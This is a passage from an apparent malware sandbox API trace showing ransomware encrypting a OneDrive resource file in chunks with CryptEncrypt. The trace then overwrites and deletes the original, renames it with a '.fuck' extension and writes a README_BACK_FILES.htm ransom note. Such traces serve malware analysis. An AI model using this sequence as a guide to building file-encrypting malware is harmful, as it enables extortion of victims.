lpOverlapped=0x0) returned 1 [0271.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.427] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.428] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.429] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.430] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.431] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.431] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.431] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x340, lpOverlapped=0x0) returned 1 [0271.431] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x340, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x350) returned 1 [0271.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0271.431] CloseHandle (hObject=0x5d4c) returned 1 [0271.431] CloseHandle (hObject=0x5d3c) returned 1 [0271.431] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.436] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.436] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.438] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.440] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0271.440] CryptDestroyKey (hKey=0x2fa748) returned 1 [0271.440] CryptReleaseContext (hProv=0x2f27aa0, dwFlags=0x0) returned 1 [0271.440] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.440] FindClose (in: hFindFile=0x2fa208 | out: hFindFile=0x2fa208) returned 1 [0271.440] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\readme_back_files.htm")) returned 0xffffffff [0271.440] AreFileApisANSI () returned 1 [0271.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0271.440] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.441] GetFileType (hFile=0x5d48) returned 0x1 [0271.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.444] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.444] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0271.447] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.447] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.447] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.447] GetLastError () returned 0x0 [0271.448] GetFileAttributesA 